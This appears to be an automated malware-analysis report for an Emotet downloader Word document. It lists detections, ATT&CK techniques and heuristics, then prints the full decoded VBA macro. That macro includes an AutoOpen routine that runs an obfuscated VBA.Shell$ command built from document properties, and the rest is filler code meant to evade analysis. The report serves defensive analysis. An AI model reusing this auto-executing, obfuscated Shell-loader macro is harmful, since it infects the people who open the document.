MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6344335-3', indicating it's a known downloader variant of the Emotet family. Heuristics confirm the presence of VBA macros, specifically an AutoOpen macro that utilizes the Shell() function to execute PowerShell commands. This strongly suggests the document's purpose is to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
On Error Resume Next VBA.Shell$ "" + aLFuBtSm + HavZEYYBxUL + SXuBEZuMe + KpsFVTRkMRv + gASKfxPGhvh + cwRmPXLVK + nHwMFtRHv + TPxegLDuUHP + ActiveDocument.CustomDocumentProperties("HHgkyzfssG") + aLFuBtSm + HavZEYYBxUL + SXuBEZuMe + KpsFVTRkMRv + gASKfxPGhvh + cwRmPXLVK + nHwMFtRHv + TPxegLDuUHP + ActiveDocument.BuiltInDocumentProperties("Comments") + aLFuBtSm + HavZEYYBxUL + SXuBEZuMe + KpsFVTRkMRv + gASKfxPGhvh + cwRmPXLVK + nHwMFtRHv + TPxegLDuUHP + SNBChSZeyfC, 0 End Function -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() wCaHvFGs -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8902 bytes |
SHA-256: a85243d1e5e786e4e6c349c02918ada70c38956186f5250abf8f553dc3d6385b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub xUJ(tKc)
On Error Resume Next
Set qPnB469 = YbKV4g
yzninNZTH = Hex(ZUKMtqEE)
Do
zXcztxA = DZCBb3J / Fix(QjtOey) * slhi2 + CDate(pjnX89) + CLYV3q7 - ChrB(44 / CInt(873)) - 50 * CByte(428163408 / Atn(579 * 989 + OqYD1BAO7 - Chr(WrGZPKw)) * SnbEFPP1o * Sgn(EfgKy)) * 399437367 - 8008 + 42 + CByte(761)
Select Case njHy8
Case 470
JJFvl = Rnd(ScTw)
qDWI51es = CLng(JONF - Round(lNAB) * ZUzWMt + Chr(6))
kWRF88 = Oct(ENk + Int(uUt - CBool(43 - ChrW(7 - CInt(PgIU)) / 2 - CSng(176960005)) * cQgA1jb - CByte(2 / cops7eup4)))
Case 6528
xxHYd1 = xFoID
pVhXyrC5 = Uwf
qBjzi = Round(9032)
Case 45
pDWo = oZa
ZGMD797 = Chr(MlxrxTJjS)
DBQG66 = Hex(JFqPS8)
End Select
Dim khlDB(4018)
RxcYk55V = Rnd(gYboeGy)
Do While kafXo > OeTkm0
pbYP0E7SS = CSng(MejP)
Loop
Set orNbRG2e8 = 8
Loop Until RgF And AQwr06Fb
End Sub
Sub rXFsx(MYf)
On Error Resume Next
For Foo = WcCPF6J To NqQQ
For bVin2v = zjYWVEl6 To BoSw
swd = 975 + yugVW * 74 * Int(35 + DRgTO81) / 2235 + Fix(FLqxNr27 - aUxy00 * ZzSW - Atn(TfIU))
Next
If mgpL4C <= OACu Then
gGBW = 293473561
End If
While mko < bKk
XlPvy8X6 = Ynsi2 * 81 - 114701714 + CDate(MAwAvw36) / (cTxLB8S62 / Round(mRyC2 - Chr(108914875) / hZDx1CP * FgLL4718M) / jSzZ - 288377165 / 8185 * CStr(OMTV))
Wend
For hLt = QgQd8 To eFvkr4m
blxmxj = CSng(SsLcq6P84)
Next
Set OaEwQ8V3 = 2
GyBS83q0 = (13 + kelN4XGyD + 53 + Sgn(81 + CStr(7) - SzdhQDX / 487462085) / vCEpS * Rnd(RWPrdldf / CSng(JLfs2 - tPcWO)) / 7 / ChrB(ftfv * Sin))
Next
Set vTnIyK = CwAP
Do
Set VZA = 192723503
Flaka = 104444520 * Atn(TPdkX / gDZIuv * RZeA2vx + CByte(5946)) + (HUhOn8tD - Log(lAny) + (75 * Cos(Ufpq723 * UhtO)))
VBZx24HY = 30966165 / CMbN3613 - 4 * UxDFn20su + SySvC3 + 484342634 - (189100255 + LGzu74a)
Set oRxB55B = 174769510
Loop Until JYml61aZ Or wEvbV2
End Sub
Sub KabI6kD()
On Error Resume Next
Do
Do While qmVI0 >= 10
snR = CInt(hpyjfb50b)
Loop
Set ghdo5d3 = rdfTZB
QVC = 535948270 * 293645200
Loop Until BNm Xor 16
Cjo = 128729489 - rLsi
End Sub
Sub autoopen()
wCaHvFGs
End Sub
Sub EdxX3Cu5()
On Error Resume Next
Do While tTt >= 4
If BABn >= XdkouN Then
LdHKK3 = Nag
End If
For waA = 3 To 382096901
twXRn2 = (ZRdX9kvw + 3 + 557 + Hex(27) + (xaNi / Int(32) - 98 + Chr(kXhW)))
Next
Select Case tpkh1
Case 5998
sUeKI76 = CSng(7 - Oct(9))
llKV = CFsiGY7
Case 118
yLmU = CBool(407469117)
gMAX = CInt(sBRn2)
Case 1456
uOFowlb = 4
CCrj83s = Fix(IswC)
End Select
Do
WSeF4Cl = 231750476 * CSng(NANHh1 * Oct(9753 + Int(gbwV)) - KdzHWUk7 / CByte(65153435)) - 412 * CSng(SuAW14M38)
Loop Until TPMG8 Xor gOiV
Set FaxP1GYX5 = 386908307
Loop
ALex6g2 = qlwJ3e4U7 * Int(2) - ejvM38j * 6631 - (cRgX82II * CByte(XYkz - CDbl(278007105)) * UJYO9 - rGDIx3aC - hHU + VleM04 + LKNUWG5 * jzWW8)
For Each CsGx04SV In MORnz
AVary = Hex(29)
Select Case RbgQ37k
Case 6
nSo = 65
FsHs = ioMZ
Case 61
oclT15 = 76
XkbhrF11 = 543
End Select
AErr218 = 28756563 * SKjLSLo
If Adoa21K <= Ozequ7h Then
HMVC1 = 112245838
End If
JSmZ3 = fbBft16S + UcDCDk
ZENm4qP08 = Fusaj2D / ANNF87vmU
Next
End Sub
Sub ygt(hyPBtO)
On Error Resume Next
oDPNVF0J = (3 + Arfj89aj1 * fcRn00 * CDbl(eYAQP3) - 3277 + CSng(38) * 9 - TpW * 531082637 * Round(PTzL4n8))
Select Case YNbA
Case 40
HMeZ0 = 37
aTCS00JI = Int(377488957)
qRA = 378
Case 343300416
tfxE = CDate(ZTVsM / Oct(5) - 65 / ChrB(ETaPj))
ATBt9 = Cos(cbFWK)
iqqVZE341 = Int(PnUt3be)
End Select
rkq = (570 * CBool(rGw) * drbngy * CDbl(gNvWb00 - Sin(3195 + 7162 - BTiuUQ5T / Int(515)) + 383886529 * axds) / (95 * SPpFN / lcpFZq4Y7 / Int(3)) - (5781 / peh * rXTk2i5M / CDate(2420)))
End Sub
Sub OalVO(poZlQ6V2)
On Error Resume Next
For dubZT16h6 = 511 To 2624
Dim CnSA2()
ReDim CnSA2(2)
CnSA2(0) = 3372
CnSA2(1) = 5
XfjuYcA32 = 108974746 * ZHWlWSaa3
For Each bgs In iips4jC
SzSxFP11 = CStr(aCs)
Next
Next
For Each mrUcTm67a In qyqF69
For Each RTSs In pPoeI
SBBz93b = PqJX7B
Next
Select Case ARri6z26C
Case 631
OsF = yYuvKVv88
ozHt1bs = Fix(CfKRTD336)
Case 9
NbWA6H4C = 8070
vZqGz = CInt(292749546)
End Select
For Each bNPF771i In bHcC8ahh
uBv = 36 / CLng(CpwHe6 - CStr(Fmm)) - (9018 / CBool(5864 - Rnd(rFGQ3t + 74 + Eqq + 243))) / (JIfD4X * Int(ItDo4JR / ChrB(55)) * BKLWa0grE * CSng(AozX3MM1B / CDate(cJOVm * Tan(eSNx))))
Next
iIN = xRe * 125640127
Do While bYvV6tD6 And tJDh
PVzkn8OS0 = Yyre4
Loop
For Each pkSy0 In eyGXa
cPH = (pzLO20N / Round(9 / 8) * 163177762 + Sin(Rqwhak2j7 * CDbl(4) - 4848 - Fix(QBAXVh90)) - 92 / CSng(QtRu4W) * mAQh0G / Cos(18 + Sqr(xhZyo5)) * (5 + 6 * yCCBT / Rnd(457815554 + qhx)))
Next
Next
If lWXc5l <> 16 Then
Do While CVLK8 <> EAKB7
sIwZ58d4G = HypPpL * CByte(dFOW4) + (hyxO8K3 / CDbl(WpGbDX81S * pjYyc / Dkgf * CStr(qSZXx3006 / Round(rRrD) + jbkq35ORF + 391)))
Loop
Do
dHaK = (lDcypJ2h / CByte(54 - ief - 741 * Tan(678)) / 65 / CLng(yhFlu1x * Sgn(34433371 + 33185744 + FIq * CSng(522637742 - CByte(yvcC60w9 - 5) / 22 + 44)) + 9 * Int(356742816)) + DglRwX / 344404609)
Loop Until UQIZ5RE3 And CeLN4kP
ElseIf MOJS1iEGH Or cHuQ19 Then
lsGK = 310
Select Case LPwR9734
Case 2
CHCeM08x6 = 82
iGomS9u = Hex(5524)
Case 8883
evTRc = Int(PBjMP)
DLYK9 = CStr(Bpu + Round(106915041) * hkG / 4621)
Case 51
mWHr6Sm = 75
NPOi = Sqr(6477)
End Select
End If
End Sub
Public Function wCaHvFGs()
On Error Resume Next
VBA.Shell$ "" + aLFuBtSm + HavZEYYBxUL + SXuBEZuMe + KpsFVTRkMRv + gASKfxPGhvh + cwRmPXLVK + nHwMFtRHv + TPxegLDuUHP + ActiveDocument.CustomDocumentProperties("HHgkyzfssG") + aLFuBtSm + HavZEYYBxUL + SXuBEZuMe + KpsFVTRkMRv + gASKfxPGhvh + cwRmPXLVK + nHwMFtRHv + TPxegLDuUHP + ActiveDocument.BuiltInDocumentProperties("Comments") + aLFuBtSm + HavZEYYBxUL + SXuBEZuMe + KpsFVTRkMRv + gASKfxPGhvh + cwRmPXLVK + nHwMFtRHv + TPxegLDuUHP + SNBChSZeyfC, 0
End Function
Sub idhKr9e()
On Error Resume Next
Set ujIj866 = 106605238
Do While YxUl7j0 Xor Fzx
kLPm = GwFXdU / 71790962
KDfN72G = xGpa4In * 205712718
NmROgSjsD = vZDJs + OsLYbgx
fqSMn54T = 320024377 - GVY
Loop
PPdJ1 = XaFQ / OQKn19D
End Sub
Sub YXaTYhY7()
On Error Resume Next
Set QEU = 532061135
For lheXFj = 370299407 To zRW
Do
WyEC59cA = WcPa5x / Rnd(527624251) - 4 / Sin(484) - (9208 + CStr(3 - dtOg) + JMEI + CDbl(icMvZn) + (daZe2M9t * Fix(427575189 - Sin(okICH7X12) - yfwC663 + CInt(64 * 66)) * 4621 - CLng(grXcqo6 * Round(nxyZf4UFu / CDate(2) + 1560 - CInt(vOaHs)) + qAoo8 + EdFlUK2W)))
Loop Until HTHA04W < 6
Set gdAI = 623
Select Case xKyL
Case 7
VGn = 61
StKh = 802
zdVy3 = WusS95G
Case 1
JwFt0ssW = ChrB(KkbI47 - IxeLGa888 * 807 + JRpk562o3)
ugyMW1A7k = 4241
hBLG6V3 = ChrB(445)
Case 5289
UeJH392 = Sin(41)
ZZJKoFW9 = Chr(DpRSk3092)
pisVN77E = wgTcceF8
End Select
Next
Select Case mwPFqFw
Case 1
tLon32L6n = Sin(8789 - CInt(TlbsN6s) * 95 - NfQE9)
PvYAQ6W = kgO
wTObx = CByte(4)
Case 811
dqds7kD0 = Int(246904904)
GFTsGza = ChrW(aBhU1)
ain = wUzC714Y
End Select
End Sub
Sub saW(cYitH)
On Error Resume Next
eOXU833j8 = 337407272 * 429913118
AAyw67c = 378005288 + Tan(PCoW0Ieb7 + Int(EhJwP1O)) * 432820553 - Sgn(OHfP) + 460 * Chr(19)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.